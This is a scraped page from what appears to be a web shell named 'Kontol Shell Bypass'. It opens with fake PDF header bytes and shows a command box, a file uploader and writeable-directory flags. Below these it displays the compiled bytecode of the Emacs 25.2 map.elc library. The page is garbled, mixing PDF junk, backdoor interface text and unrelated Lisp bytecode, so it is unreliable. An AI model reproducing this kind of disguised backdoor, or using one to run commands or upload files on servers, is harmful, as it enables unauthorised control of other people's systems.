%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/emacs-lisp/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/emacs-lisp/map.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2.1
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


(require 'seq)
#@540 Build a `pcase' pattern matching map elements.

ARGS is a list of elements to be matched in the map.

Each element of ARGS can be of the form (KEY PAT), in which case KEY is
evaluated and searched for in the map.  The match fails if for any KEY
found in the map, the corresponding PAT doesn't match the value
associated to the KEY.

Each element can also be a SYMBOL, which is an abbreviation of a (KEY
PAT) tuple of the form (\='SYMBOL SYMBOL).

Keys in ARGS not found in the map are ignored, and the match doesn't
fail.

(fn &rest ARGS)
(defalias 'map--pcase-macroexpander #[128 "\300\301\302!BB\207" [and (pred mapp) map--make-pcase-bindings] 5 (#$ . 426)])
(byte-code "\300\301\302\303#\210\300\304\305\301#\207" [put map--pcase-macroexpander edebug-form-spec nil map pcase-macroexpander] 4)
#@330 Bind the variables in KEYS to the elements of MAP then evaluate BODY.

KEYS can be a list of symbols, in which case each element will be
bound to the looked up value in MAP.

KEYS can also be a list of (KEY VARNAME) pairs, in which case
KEY is an unquoted form.

MAP can be a list, hash-table or array.

(fn KEYS MAP &rest BODY)
(defalias 'map-let '(macro . #[642 "\300\301!DCBB\207" [pcase-let map--make-pcase-patterns] 6 (#$ . 1230)]))
(byte-code "\300\301\302\303#\210\304\301\305\306#\207" [function-put map-let lisp-indent-function 2 put edebug-form-spec t] 4)
#@232 Lookup KEY in MAP and return its associated value.
If KEY is not found, return DEFAULT which defaults to nil.

If MAP is a list, `eql' is used to lookup KEY.

MAP can be a list, hash-table or array.

(fn MAP KEY &optional DEFAULT)
(defalias 'map-elt #[770 "<\203\300#\207\301!\203\302#\207\303!\2031\304Y\2030\305!W\2030\306\"\207\207\307\310\"\207" [alist-get hash-table-p gethash arrayp 0 seq-length seq-elt error "Unsupported map: %s"] 7 (#$ . 1806)])
(put 'map-elt 'gv-expander #[1027 "\300\301D\302\303\304\305\306\n		#\307\"\310\311%\"\207" [gv-get gv-delay-error make-byte-code 514 "\301\303!\203\211\202\304\305!\302\303!\203\211\202\304\306!\307\310D\311\312\313EF\300\"\300\314\nF\315\316\317\320\321
\"\322\"\323\324%\"F=\203T\211\202[\325DC\"\266\203=\203g\211\202n\325DC\"\207" vconcat vector [macroexp-const-p make-symbol "key" "default" if listp gv-get alist-get gv-synthetic-place map-elt make-byte-code 257 "\302\300\301F\207" vconcat vector [map--put] 5 "\n\n(fn V)" macroexp-let*] 18 "\n\n(fn MGETTER MSETTER)"] 14 "\n\n(fn DO MAP KEY &optional DEFAULT)"])
#@187 Associate KEY with VALUE in MAP and return VALUE.
If KEY is already present in MAP, replace the associated value
with VALUE.

MAP can be a list, hash-table or array.

(fn MAP KEY VALUE)
(defalias 'map-put '(macro . #[771 "\300\301EE\207" [setf map-elt] 7 (#$ . 2958)]))
#@190 Delete KEY from MAP and return MAP.
No error is signaled if KEY is not a key of MAP.  If MAP is an
array, store nil at the index KEY.

MAP can be a list, hash-table or array.

(fn MAP KEY)
(defalias 'map-delete #[514 "<\203\211\236\211\203\300\"\262\210\202E\301!\203$\302\"\210\202E\303!\203@\211\304Y\203E\211\305!X\203E\306I\210\202E\307\310\"\210\207" [delq hash-table-p remhash arrayp 0 seq-length nil error "Unsupported map: %s"] 6 (#$ . 3238)])
#@177 Traverse MAP using KEYS and return the looked up value or DEFAULT if nil.

Map can be a nested map composed of alists, hash-tables and arrays.

(fn MAP KEYS &optional DEFAULT)
(defalias 'map-nested-elt #[770 "\300\301#\206	\211\207" [seq-reduce #[514 "\300!\205\n\301\"\207" [mapp map-elt] 5 "\n\n(fn ACC KEY)"]] 7 (#$ . 3722)])
#@84 Return the list of keys in MAP.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-keys #[257 "\300\301\"\207" [map-apply #[514 "\207" [] 3 "\n\n(fn KEY _)"]] 4 (#$ . 4064)])
#@86 Return the list of values in MAP.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-values #[257 "\300\301\"\207" [map-apply #[514 "\207" [] 3 "\n\n(fn _ VALUE)"]] 4 (#$ . 4262)])
#@111 Return the elements of MAP as key/value association lists.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-pairs #[257 "\300\301\"\207" [map-apply cons] 4 (#$ . 4466)])
#@78 Return the length of MAP.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-length #[257 "\300!G\207" [map-keys] 3 (#$ . 4660)])
#@74 Return a copy of MAP.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-copy #[257 "\211<\203	\300!\207\301!\203\302!\207\303!\203\300!\207\304\305\"\207" [seq-copy hash-table-p copy-hash-table arrayp error "Unsupported map: %s"] 4 (#$ . 4812)])
#@194 Apply FUNCTION to each element of MAP and return the result as a list.
FUNCTION is called with two arguments, the key and the value.

MAP can be a list, hash-table or array.

(fn FUNCTION MAP)
(defalias 'map-apply #[514 "\211<\203	\300\202!\301!\203\302\202!\303!\203\304\202!\305\306\"\"\207" [map--apply-alist hash-table-p map--apply-hash-table arrayp map--apply-array error "Unsupported map: %s"] 5 (#$ . 5092)])
#@120 Return the result of applying FUNCTION to each key of MAP.

MAP can be a list, hash-table or array.

(fn FUNCTION MAP)
(defalias 'map-keys-apply #[514 "\300\301\302\303\304\305!\306\"\307\310%\"\207" [map-apply make-byte-code 514 "\300!\207" vconcat vector [] 4 "\n\n(fn KEY _)"] 9 (#$ . 5528)])
#@122 Return the result of applying FUNCTION to each value of MAP.

MAP can be a list, hash-table or array.

(fn FUNCTION MAP)
(defalias 'map-values-apply #[514 "\300\301\302\303\304\305!\306\"\307\310%\"\207" [map-apply make-byte-code 514 "\300!\207" vconcat vector [] 4 "\n\n(fn _ VAL)"] 9 (#$ . 5835)])
#@134 Return an alist of key/val pairs for which (PRED key val) is non-nil in MAP.

MAP can be a list, hash-table or array.

(fn PRED MAP)
(defalias 'map-filter #[514 "\300\301\302\303\304\305\306\307	!\310\"\311\312%\"\"\207" [delq nil map-apply make-byte-code 514 "\300\"\205\nB\207" vconcat vector [] 5 "\n\n(fn KEY VAL)"] 11 (#$ . 6146)])
#@134 Return an alist of the key/val pairs for which (PRED key val) is nil in MAP.

MAP can be a list, hash-table or array.

(fn PRED MAP)
(defalias 'map-remove #[514 "\300\301\302\303\304\305!\306\"\307\310%\"\207" [map-filter make-byte-code 514 "\300\"?\207" vconcat vector [] 5 "\n\n(fn KEY VAL)"] 9 (#$ . 6497)])
#@71 Return non-nil if MAP is a map (list, hash-table or array).

(fn MAP)
(defalias 'mapp #[257 "\211<\206\300!\206\301!\207" [hash-table-p arrayp] 3 (#$ . 6819)])
#@84 Return non-nil if MAP is empty.

MAP can be a list, hash-table or array.

(fn MAP)
(defalias 'map-empty-p #[257 "\211<\203\211?\207\300!\203\301!\302U\207\303!\203\304!\207\305\306\"\207" [hash-table-p hash-table-count 0 arrayp seq-empty-p error "Unsupported map: %s"] 4 (#$ . 6991)])
#@186 Return non-nil if MAP contain KEY, nil otherwise.
Equality is defined by TESTFN if non-nil or by `equal' if nil.

MAP can be a list, hash-table or array.

(fn MAP KEY &optional TESTFN)
(defalias 'map-contains-key #[770 "\300\301!#\207" [seq-contains map-keys] 7 (#$ . 7294)])
#@134 Return a non-nil if (PRED key val) is non-nil for any key/value pair in MAP.

MAP can be a list, hash-table or array.

(fn PRED MAP)
(defalias 'map-some #[514 "\3002\301\302\303\304\305\306!\307\"\310\311%\"\210\3120\207" [map--break map-apply make-byte-code 514 "\300\"\211\205\f\301\302\"\207" vconcat vector [throw map--break] 6 "\n\n(fn KEY VALUE)" nil] 9 (#$ . 7580)])
#@134 Return non-nil if (PRED key val) is non-nil for all elements of the map MAP.

MAP can be a list, hash-table or array.

(fn PRED MAP)
(defalias 'map-every-p #[514 "\3002\301\302\303\304\305\306!\307\"\310\311%\"\210\3120\207" [map--break map-apply make-byte-code 514 "\300\"\206\301\302\303\"\207" vconcat vector [throw map--break nil] 5 "\n\n(fn KEY VALUE)" t] 9 (#$ . 7970)])
#@127 Merge into a map of type TYPE all the key/value pairs in MAPS.

MAP can be a list, hash-table or array.

(fn TYPE &rest MAPS)
(defalias 'map-merge #[385 "\300C\203\301\302\303\304\305\306!\307\"\310\311%\211A\262\242\"\210\202\312\242\"\207" [nil map-apply make-byte-code 514 "\300\242<\203&\211\300\242\236\203\241\202!\300B\211\262\300\242B\240\266\202\202,\301\300\242#\207" vconcat vector [map--put] 8 "\n\n(fn KEY VALUE)" map-into] 10 (#$ . 8363)])
#@237 Merge into a map of type TYPE all the key/value pairs in MAPS.
When two maps contain the same key, call FUNCTION on the two
values and use the value returned by it.
MAP can be a list, hash-table or array.

(fn TYPE FUNCTION &rest MAPS)
(defalias 'map-merge-with #[642 "\300C\203!\301\302\303\304\305\306\"\307\"\310\311%\211A\262\242\"\210\202\312\242\"\207" [nil map-apply make-byte-code 514 "\301\242<\203:\211\301\242\236\302\301\242\"\203\300\303\301\242\"\"\202 \203*\241\2025\301B\211\262\301\242B\240\266\202\202V\304\301\242\302\301\242\"\203T\300\303\301\242\"\"\202U#\207" vconcat vector [map-contains-key map-elt map--put] 10 "\n\n(fn KEY VALUE)" map-into] 12 (#$ . 8850)])
#@164 Convert the map MAP into a map of type TYPE.

TYPE can be one of the following symbols: list or hash-table.
MAP can be a list, hash-table or array.

(fn MAP TYPE)
(defalias 'map-into #[514 "\211\300=\203\n\301!\207\211\302=\203\303!\207\304\305\"\207" [list map-pairs hash-table map--into-hash-table error "Not a map type name: %S"] 5 (#$ . 9583)])
(defalias 'map--put #[771 "<\203\300\"\211\203\211\241\202\301\302\"\207\303!\203$\304#\207\305!\203/I\207\301\306\"\207" [assoc error "No place to change the mapping for %S" hash-table-p puthash arrayp "Unsupported map: %s"] 7 "\n\n(fn MAP KEY V)"])
#@90 Private function used to apply FUNCTION over MAP, MAP being an alist.

(fn FUNCTION MAP)
(defalias 'map--apply-alist #[514 "\300\301\302\303\304\305!\306\"\307\310%\"\207" [seq-map make-byte-code 257 "\300@A\"\207" vconcat vector [] 4 "\n\n(fn PAIR)"] 9 (#$ . 10217)])
#@94 Private function used to apply FUNCTION over MAP, MAP being a hash-table.

(fn FUNCTION MAP)
(defalias 'map--apply-hash-table #[514 "\300C\301\302\303\304\305\306\"\307\"\310\311%\"\210\211\242\237\207" [nil maphash make-byte-code 514 "\301\300\"\301\242B\240\207" vconcat vector [] 6 "\n\n(fn KEY VALUE)"] 11 (#$ . 10497)])
#@90 Private function used to apply FUNCTION over MAP, MAP being an array.

(fn FUNCTION MAP)
(defalias 'map--apply-array #[514 "\300C\301\302\303\304\305\306\"\307\"\310\311%\"\207" [0 seq-map make-byte-code 257 "\300\301\242\"\301\211\242T\240\210\207" vconcat vector [] 4 "\n\n(fn ELT)"] 11 (#$ . 10835)])
#@42 Convert MAP into a hash-table.

(fn MAP)
(defalias 'map--into-hash-table #[257 "\300\301\302!\303\304$C\305\306\307\310\311\312!\313\"\314\315%\"\210\211\242\207" [make-hash-table :size map-length :test equal map-apply make-byte-code 514 "\300\242<\203&\211\300\242\236\203\241\202!\300B\211\262\300\242B\240\266\202\202,\301\300\242#\207" vconcat vector [map--put] 8 "\n\n(fn KEY VALUE)"] 9 (#$ . 11151)])
#@80 Return a list of pcase bindings from ARGS to the elements of a map.

(fn ARGS)
(defalias 'map--make-pcase-bindings #[257 "\300\301\"\207" [seq-map #[257 "\211:\203\300\301\302@EA@E\207\300\301\302\303DEE\207" [app pcase--flip map-elt quote] 6 "\n\n(fn ELT)"]] 4 (#$ . 11583)])
#@73 Return a list of `(map ...)' pcase patterns built from ARGS.

(fn ARGS)
(defalias 'map--make-pcase-patterns #[257 "\300\301\302\"B\207" [map seq-map #[257 "\211:\203\211@\300=\203\301!\207\207" [map map--make-pcase-patterns] 3 "\n\n(fn ELT)"]] 5 (#$ . 11873)])
(provide 'map)

Kontol Shell Bypass